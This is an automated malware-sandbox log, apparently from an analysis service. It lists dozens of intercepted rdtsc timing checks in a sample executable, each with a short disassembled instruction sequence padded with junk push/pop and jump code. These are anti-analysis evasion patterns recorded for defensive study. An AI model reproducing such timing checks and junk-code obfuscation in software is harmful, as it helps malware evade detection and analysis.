    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC9F52 second address: EC9F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC9F56 second address: EC9F6A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jbe 00007F0BACBDA3D6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EC9F6A second address: EC9F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F0BACBDA196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E95A0B second address: E95A11 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E95A11 second address: E95A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jmp 00007F0BACBDA1A9h 0x00000012 pop esi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E95B6D second address: E95B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9608D second address: E9612D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0BACBDA196h 0x0000000a popad 0x0000000b pop ecx 0x0000000c add dword ptr [esp], 464A77E7h 0x00000013 movzx edx, cx 0x00000016 call 00007F0BACBDA199h 0x0000001b push eax 0x0000001c pushad 0x0000001d jno 00007F0BACBDA196h 0x00000023 push edx 0x00000024 pop edx 0x00000025 popad 0x00000026 pop eax 0x00000027 push eax 0x00000028 jmp 00007F0BACBDA1A2h 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 pushad 0x00000032 jnp 00007F0BACBDA198h 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b jmp 00007F0BACBDA1A6h 0x00000040 jmp 00007F0BACBDA1A1h 0x00000045 popad 0x00000046 popad 0x00000047 mov eax, dword ptr [eax] 0x00000049 jl 00007F0BACBDA1A7h 0x0000004f jmp 00007F0BACBDA1A1h 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 pushad 0x00000059 pushad 0x0000005a jmp 00007F0BACBDA19Ah 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E9612D second address: E9613A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0BACBDA3D6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E967CA second address: E967CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96B8A second address: E96B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96B91 second address: E96BB6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BACBDA198h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F0BACBDA19Eh 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96BB6 second address: E96BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96BBB second address: E96BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA1A4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96CC2 second address: E96CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96CC7 second address: E96D3A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BACBDA198h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2C2Bh] 0x00000015 lea eax, dword ptr [ebp+1247379Bh] 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0BACBDA198h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 mov di, si 0x00000038 nop 0x00000039 jc 00007F0BACBDA1AFh 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 jmp 00007F0BACBDA1A5h 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a jmp 00007F0BACBDA19Dh 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA646 second address: ECA65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0BACBDA3D8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F0BACBDA3D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA65D second address: ECA663 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA663 second address: ECA68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F0BACBDA3DDh 0x0000000f jo 00007F0BACBDA3D6h 0x00000015 pop edx 0x00000016 push esi 0x00000017 jc 00007F0BACBDA3D6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA68A second address: ECA68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA68F second address: ECA695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA695 second address: ECA69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0BACBDA196h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA94B second address: ECA954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECE35F second address: ECE365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED0ED2 second address: ED0ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED0ED6 second address: ED0EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED0EDA second address: ED0F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0BACBDA3DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F0BACBDA3D6h 0x00000013 jmp 00007F0BACBDA3E4h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E544D3 second address: E544F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A4h 0x00000007 jmp 00007F0BACBDA19Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E544F8 second address: E54504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0BACBDA3D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E54504 second address: E54508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E54508 second address: E5450E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED66FA second address: ED6700 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED6700 second address: ED6706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5CA82 second address: E5CA8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0BACBDA196h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5CA8C second address: E5CAB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F0BACBDA3DCh 0x0000000c jmp 00007F0BACBDA3DDh 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED5493 second address: ED54B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0BACBDA196h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F0BACBDA1A0h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED54B8 second address: ED54F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0BACBDA3E9h 0x0000000f jmp 00007F0BACBDA3DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED5627 second address: ED562B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED562B second address: ED5637 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BACBDA3D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED5637 second address: ED5661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA1A3h 0x00000009 jmp 00007F0BACBDA1A3h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED517E second address: ED5194 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0BACBDA3D6h 0x00000008 jmp 00007F0BACBDA3DCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED5F83 second address: ED5F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED5F87 second address: ED5F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED5F9E second address: ED5FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0BACBDA196h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED5FAE second address: ED5FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED5FB2 second address: ED5FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED60F4 second address: ED610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0BACBDA3DDh 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED6381 second address: ED638E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED638E second address: ED63BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0BACBDA3DFh 0x00000013 pushad 0x00000014 jmp 00007F0BACBDA3DAh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED63BF second address: ED63C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED63C5 second address: ED63CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED63CA second address: ED63D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F0BACBDA196h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E52954 second address: E52969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 jc 00007F0BACBDA3D6h 0x0000000e jl 00007F0BACBDA3D6h 0x00000014 pop eax 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDBCAB second address: EDBCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDBCAF second address: EDBCD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0BACBDA3DDh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDBCD5 second address: EDBCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0BACBDA196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDBCE1 second address: EDBCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDBCF5 second address: EDBCF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDBE34 second address: EDBE3E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BACBDA3D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDC0F8 second address: EDC0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDC0FC second address: EDC120 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F0BACBDA3D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDC120 second address: EDC12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F0BACBDA196h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EDC448 second address: EDC457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007F0BACBDA3D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE0D0B second address: EE0D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE0D13 second address: EE0D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE0D19 second address: EE0D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE0D1D second address: EE0D3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E0h 0x00000007 jmp 00007F0BACBDA3DAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE0748 second address: EE074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE074E second address: EE0752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE08D3 second address: EE08F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA19Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jmp 00007F0BACBDA19Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE08F3 second address: EE08FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE951E second address: EE9543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 js 00007F0BACBDA196h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F0BACBDA1ACh 0x00000016 js 00007F0BACBDA198h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE8879 second address: EE8896 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E3h 0x00000007 ja 00007F0BACBDA3E2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE8896 second address: EE889C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE889C second address: EE88A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE88A7 second address: EE88AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE90E5 second address: EE90E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EE90E9 second address: EE90ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EEE78E second address: EEE7A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EEEBB3 second address: EEEBB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EEEBB9 second address: EEEBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EEEBBF second address: EEEBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EEED50 second address: EEED56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EEED56 second address: EEED5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EEF823 second address: EEF82D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BACBDA3D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EEF82D second address: EEF86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0BACBDA1A1h 0x0000000c jp 00007F0BACBDA196h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jng 00007F0BACBDA196h 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F0BACBDA19Bh 0x0000002a push edx 0x0000002b pop edx 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF2AE6 second address: EF2AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF2AEB second address: EF2AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: EF2AF1 second address: EF2AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
